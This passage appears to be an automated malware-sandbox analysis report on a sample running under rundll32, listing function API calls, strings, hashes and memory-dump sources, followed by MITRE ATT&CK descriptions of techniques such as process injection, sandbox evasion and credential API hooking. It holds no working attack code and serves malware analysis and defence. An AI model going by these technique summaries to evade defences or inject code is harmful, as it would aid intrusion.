Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
Instruction ID: 4c3a9d8fd3a6782410f21fb7d87bfa1bdf9fc6e0b57caae8a82327103f8b437a
Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
Instruction Fuzzy Hash: ADE06D377902043AE2206599AC02FA7B39C9B91B61F14003AFA0DEB2C1D695F80142A4

Uniqueness

Uniqueness Score: -1.00%

Function 0013A7B1 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0012F1C2,0012F1C2,?,00000000,?,?), ref: 0013A7F0

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 1dafe668f73527814c7d2a5754961dc33b59b2ca7c35c401fdaeae71204b43ce
Instruction ID: 60d654b7b480800790f62457b84ce96494b050400476cb2c53cce3907b14096c
Opcode Fuzzy Hash: 1dafe668f73527814c7d2a5754961dc33b59b2ca7c35c401fdaeae71204b43ce
Instruction Fuzzy Hash: C4E06DB2600218ABD620DF99CC40EE777ADAF45760F058254FE1C9B781C631E9448BF1

Uniqueness

Uniqueness Score: -1.00%

Function 0013A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00134526,?,00134C9F,00134C9F,?,00134526,?,?,?,?,?,00000000,00000000,?), ref: 0013A64D

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 18f896c6768a867eca6fc7c972253e350f58e9476ff11bc5053caf230727b0af
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 59E012B1200208ABDB14EF99CC41EAB77ACAF88654F118558BA5C5B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0012F1C2,0012F1C2,?,00000000,?,?), ref: 0013A7F0

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 556fd0b3180d1de8846728f0f496990304f406005f0b103aebd967884d3ba4de
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: F7E01AB1200208ABDB10DF49CC85EEB37ADAF88650F018154BA4C57241CA30E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0012F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,00128D14,?), ref: 0012F6EB

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: 10f040deb2965a3fa57e09556b2a02186a7f1b9844e043759aa9edff8c67c1fa
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 0BD0A7727503043BE610FEA49C03F2633CCAB54B00F490074F949E73C3DA54F4014165

Uniqueness

Uniqueness Score: -1.00%

Function 04432C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432C24

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3bdd1a012801387001c338488ca30ee779bb8fcf0c71a39badfd9307c7b86eaa
Instruction ID: 7b6fa4733c0713f633e9a71ffc290b0d882fee1b63f518b6b6489eb74f4a4fb6
Opcode Fuzzy Hash: 3bdd1a012801387001c338488ca30ee779bb8fcf0c71a39badfd9307c7b86eaa
Instruction Fuzzy Hash: F5B04C759015C585FE11B760460861779006BD0B05F15C062D2121655A4768E191E175

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04432890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0443293C
___swprintf_l.LIBCMT ref: 0443295E
___swprintf_l.LIBCMT ref: 044329A3
___swprintf_l.LIBCMT ref: 0446A52E

Strings

ffff:, xrefs: 0446A504
:%u.%u.%u.%u, xrefs: 0446A5B8
::%hs%u.%u.%u.%u, xrefs: 0446A527
::ffff:0:%u.%u.%u.%u, xrefs: 0446A54E

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: a0a95ca589193e98c1b9ddce7543b032af8de44eae915c23daa4df5253886ca5
Instruction ID: d4eed6ebe28d1fee6ad24571ed3a5822ec4cb17e9815b5fb57ceb960f12d64e5
Opcode Fuzzy Hash: a0a95ca589193e98c1b9ddce7543b032af8de44eae915c23daa4df5253886ca5
Instruction Fuzzy Hash: 8F51E6B2B00516BFDF20DF99988097FF7B8BF4960571482ABE455E3641E274FE118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 044A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 044A24A6
___swprintf_l.LIBCMT ref: 044A24E2
___swprintf_l.LIBCMT ref: 044A257D
___swprintf_l.LIBCMT ref: 044A25A3
___swprintf_l.LIBCMT ref: 044A25C8
___swprintf_l.LIBCMT ref: 044A2608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 044A24DA
ffff:, xrefs: 044A247D, 044A249D
::%hs%u.%u.%u.%u, xrefs: 044A249E
:%u.%u.%u.%u, xrefs: 044A25FF

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 632a0426ec4b3627425c822164f8632ff1eed4ade2b908c5033c51badd7a30fb
Instruction ID: fe36f8e1a16b81b464b22a4270d09e9891e795fe454b6e045d52c72be0aaaed4
Opcode Fuzzy Hash: 632a0426ec4b3627425c822164f8632ff1eed4ade2b908c5033c51badd7a30fb
Instruction Fuzzy Hash: 8E512370A00655ABDF30DF9DC98087FB7F9FB54204B04849BE496D7781E6B0FA10AB60

Uniqueness

Uniqueness Score: -1.00%

Function 04427630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044646FC
Execute=1, xrefs: 04464713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04464725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04464742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04464655
ExecuteOptions, xrefs: 044646A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 04464787

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: c79c4960544492a2fb84d47fb3c92a73769a34e460b437de7ec1894f19ef2473
Instruction ID: c4624159bb7a889c979eb0fa1467898943825f387be8ae1dcf22d18bf3e833dc
Opcode Fuzzy Hash: c79c4960544492a2fb84d47fb3c92a73769a34e460b437de7ec1894f19ef2473
Instruction Fuzzy Hash: 3F512B316002296BEF20EEA5ED89FAA77A8EF08714F44009FD505A7281EB71BE458F55

Uniqueness

Uniqueness Score: -1.00%

Function 044C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 70d09dd2fd3a89efefdf9ce57026a3e6bcbb9e1198525ae1ae70617a2bb69302
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: B9022675608341AFDB54CF29C490A6FBBE5EFC8704F09892EF9894B265DB31E905CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0443B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0443B6BF

Strings

+, xrefs: 0443B65A
0, xrefs: 0443B695
-, xrefs: 0443B650
0, xrefs: 0443B66F

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: aeb7a357b177ab0f2a18a6db64fc16af16080fcd8dc584096d880e0d6e376375
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: E481C370E052899EDF288E68C8517FE7BA1EF4DB22F18411BD861A7393D734B4418B51

Uniqueness

Uniqueness Score: -1.00%

Function 044A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 044A214F
___swprintf_l.LIBCMT ref: 044A2172

Strings

[, xrefs: 044A212B
%%%u, xrefs: 044A2146
]:%u, xrefs: 044A2169

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: bc34f123b65d93a1e1ebb350d510c5521a8aaa2b89560ff876e5134edf27df23
Instruction ID: 34c8ff48dd8d0f3f8b19b9f8fa0686d47b6f0030c5ebf2f6ac8a6a1c3fbd2c6a
Opcode Fuzzy Hash: bc34f123b65d93a1e1ebb350d510c5521a8aaa2b89560ff876e5134edf27df23
Instruction Fuzzy Hash: E4218176A00129ABDF20DFA9D844AFFB7E8EF58745F04016BE905E3301E770E9119BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0441F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0446031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044602BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044602E7

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 04719084f5d0296739cb2b49038d429d02187d550def95068d0edf23ff9d42d1
Instruction ID: 6096a56ab76a2aa15df98cf6db4b8e4a54c24a968f1cb13dccf2bf7bbade651d
Opcode Fuzzy Hash: 04719084f5d0296739cb2b49038d429d02187d550def95068d0edf23ff9d42d1
Instruction Fuzzy Hash: 03E190706047419FDB25CF28C844B6AB7E0BF88714F140A5EE5A68B3E1E775F94ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 0442BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 04467BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04467B7F
RTL: Resource at %p, xrefs: 04467B8E

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 2e25eceb95f012d8931a6615748e30186759b474521898404ced3801d7fb23f2
Instruction ID: 56066ec9635dcd3c84ce66db9266c571716e577f1156b500c43cf93dc3f1bf35
Opcode Fuzzy Hash: 2e25eceb95f012d8931a6615748e30186759b474521898404ced3801d7fb23f2
Instruction Fuzzy Hash: BA41BF317007429BEB20DE258940B6BB7E5EB88718F000A1EE956DB780DB71F8068B91

Uniqueness

Uniqueness Score: -1.00%

Function 0442B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0446728C

Strings

RTL: Re-Waiting, xrefs: 044672C1
RTL: Resource at %p, xrefs: 044672A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04467294

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 19426b97d9b00d97ad5c3674a99a79066807b28ab741758f7238a73ae7e0c9b2
Instruction ID: b8d6f85cce112454fab7fea61f28c0c4c8eeeacdb351b03bdaa07ccf6ddf6705
Opcode Fuzzy Hash: 19426b97d9b00d97ad5c3674a99a79066807b28ab741758f7238a73ae7e0c9b2
Instruction Fuzzy Hash: 7441D231700656ABEF20DE25CD41B6AB7A5FB44718F10061BF956AB341DB21F846CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 044A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 044A238D
___swprintf_l.LIBCMT ref: 044A23B3

Strings

%%%u, xrefs: 044A2384
]:%u, xrefs: 044A23AA

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 3f1656a1484f66803c965040a367aa43ff816716e74313a87ac04fd3b3c66e14
Instruction ID: ef42af8d9e97178ca04157c6ff48b21b536f2cae3ec1919df2e6e84f7ba82aa9
Opcode Fuzzy Hash: 3f1656a1484f66803c965040a367aa43ff816716e74313a87ac04fd3b3c66e14
Instruction Fuzzy Hash: 23317272A001299EDF20DE29CC40AAB77E8FF55614F44059AE849E3340EE70AA559B61

Uniqueness

Uniqueness Score: -1.00%

Function 04437D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04437E8B

Strings

-, xrefs: 04437DDD
+, xrefs: 04437DE8

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 240e6bab2f29c04f7359be8c28266e3276d4c20f5317b912f0d424fc3da8e7cc
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 6A9165B1E002159AEF24DF59C8816BFB7B5BF4CB26F14851BF895A73C0E730A9418B50

Uniqueness

Uniqueness Score: -1.00%

Function 043F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 043F9175
$, xrefs: 043F9191

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: a20653a78e5fee84851237ce270ce75e20aaa93fd1b361ac760364eece250942
Instruction ID: c992e7fa1893654af5f3c8a9bb54cd98c41fd7a198501d025f4429e2e0515d08
Opcode Fuzzy Hash: a20653a78e5fee84851237ce270ce75e20aaa93fd1b361ac760364eece250942
Instruction Fuzzy Hash: F781FAB1D002699BDF35DB54CC44BEAB7B4AF48714F0041EBAA19B7291E7706E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
